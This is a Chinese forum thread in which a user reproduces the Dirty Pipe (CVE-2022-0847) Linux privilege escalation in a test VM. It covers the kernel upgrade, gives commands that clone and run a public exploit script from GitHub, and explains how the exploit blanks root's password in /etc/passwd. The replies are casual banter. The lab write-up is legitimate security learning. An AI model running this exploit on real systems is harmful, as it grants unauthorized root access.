上一主题 下一主题
ScriptCat,新一代的脚本管理器脚本站,与全世界分享你的用户脚本油猴脚本开发指南教程目录
返回列表 发新帖

Dirty Pipe提权漏洞复现

[复制链接]
  • TA的每日心情

    6 天前
  • 签到天数: 28 天

    [LV.4]偶尔看看III

    14

    主题

    118

    帖子

    120

    积分

    荣誉开发者

    Rank: 10Rank: 10Rank: 10

    积分
    120

    国庆纪念章中秋纪念章

    发表于 2022-4-15 13:30:56 | 显示全部楼层 | 阅读模式

    环境准备
    一开始在环境准备上花费了挺多时间,安装了多个linux版本镜像,找了很久没找到高版本的内核,比较低的版本又无法完成升级。

    本提权漏洞要求内核是5.8以上的才能利用,想要复现漏洞需要安装高版本内核。

    最终只能自己手动去升级内核。

    本次试用的kail测试环境,最开始5.4版本,用如下方法可以进行升级。


    具体升级

    从如下网址下载需要升级的内核版本
    https://kernel.ubuntu.com/~kernel-ppa/mainline/v5.8.5/amd64/
    图片.png
    下载两个文件到本地后,使用如下命令进行内核升级
    图片.png
    安装成功后,更新grub系统引导并重启

    update-grub
    reboot
    再使用uname -a查看内核版本就已经是5.8.5了
    图片.png
    至此,已经完成内核升级,有了环境。

    中间使用了gcc来编译提权源码,因此还需要安装gcc。

    然后再测试Dirty Pipe
    git clone https://github.com/imfiver/CVE-2022-0847.git
    cd CVE-2022-0847
    chmod +x Dirty-Pipe.sh
    bash Dirty-Pipe.sh
    图片.png
    漏洞影响版本:影响版本:5.8 <= Linux 内核版本 < 5.16.11 / 5.15.25 / 5.10.102


    具体漏洞原理

    覆盖/etc/passwd的root用户信息。

    具体是通过覆盖r后面的5个字节,为了将x替换为空,相当于置空了密码,这样su无需密码可直接提权至root权限 Twitter上有放出更加简易的POC。

    摸鱼中
  • TA的每日心情

    6 天前
  • 签到天数: 28 天

    [LV.4]偶尔看看III

    14

    主题

    118

    帖子

    120

    积分

    荣誉开发者

    Rank: 10Rank: 10Rank: 10

    积分
    120

    国庆纪念章中秋纪念章

    发表于 2022-4-15 13:34:55 | 显示全部楼层
    说实话,比起敲键盘来说还是截图方便( ̄▽ ̄)~*
    摸鱼中
    回复

    使用道具 举报

  • TA的每日心情
    慵懒
    3 天前
  • 签到天数: 43 天

    [LV.5]常住居民I

    128

    主题

    1663

    帖子

    1867

    积分

    管理员

    Rank: 10Rank: 10Rank: 10

    积分
    1867

    猫咪币纪念章热心会员活跃会员突出贡献三好学生中秋纪念章国庆纪念章

    发表于 2022-4-15 13:42:41 | 显示全部楼层
    厉害了 哥哥是搞安全的吗?

    最近论坛和博客爆出不少漏洞。。。。被日麻了,连续几天在补了
    上不慕古,下不肖俗。为疏为懒,不敢为狂。为拙为愚,不敢为恶。/ 微信公众号:一之哥哥
    回复

    使用道具 举报

  • TA的每日心情

    6 天前
  • 签到天数: 28 天

    [LV.4]偶尔看看III

    14

    主题

    118

    帖子

    120

    积分

    荣誉开发者

    Rank: 10Rank: 10Rank: 10

    积分
    120

    国庆纪念章中秋纪念章

    发表于 2022-4-15 14:08:48 | 显示全部楼层
    哈哈哈,有点涉猎,上个月不是欧美各大公司都被爆破了,流出来好多东西,赶紧来复习一下
    摸鱼中
    回复

    使用道具 举报

  • TA的每日心情

    6 天前
  • 签到天数: 28 天

    [LV.4]偶尔看看III

    14

    主题

    118

    帖子

    120

    积分

    荣誉开发者

    Rank: 10Rank: 10Rank: 10

    积分
    120

    国庆纪念章中秋纪念章

    发表于 2022-4-15 14:09:02 | 显示全部楼层
    王一之 发表于 2022-4-15 13:42
    厉害了 哥哥是搞安全的吗?

    最近论坛和博客爆出不少漏洞。。。。被日麻了,连续几天在补了 ...

    哈哈哈,有点涉猎,上个月不是欧美各大公司都被爆破了,流出来好多东西,赶紧来复习一下
    摸鱼中
    回复

    使用道具 举报

  • TA的每日心情
    无聊
    2022-4-18 01:37
  • 签到天数: 30 天

    [LV.5]常住居民I

    303

    主题

    2584

    帖子

    2653

    积分

    荣誉开发者

    非物质文化遗产社会摇传承人

    Rank: 10Rank: 10Rank: 10

    积分
    2653

    猫咪币纪念章

    发表于 2022-4-15 14:34:24 | 显示全部楼层
    哥哥竟然还是大黑阔
    混的人。
    ------------------------------------------
    進撃!永遠の帝国の破壊虎---李恒道
    个人宣言:この世界で私に胜てる人とコードはまだ生まれていません。死ぬのが怖くなければ来てください。
    回复

    使用道具 举报

  • TA的每日心情

    6 天前
  • 签到天数: 28 天

    [LV.4]偶尔看看III

    14

    主题

    118

    帖子

    120

    积分

    荣誉开发者

    Rank: 10Rank: 10Rank: 10

    积分
    120

    国庆纪念章中秋纪念章

    发表于 2022-4-15 17:50:36 | 显示全部楼层
    李恒道 发表于 2022-4-15 14:34
    哥哥竟然还是大黑阔

    我进去起码有你一半功劳
    摸鱼中
    回复

    使用道具 举报

    发表回复

    本版积分规则

    快速回复 返回顶部 返回列表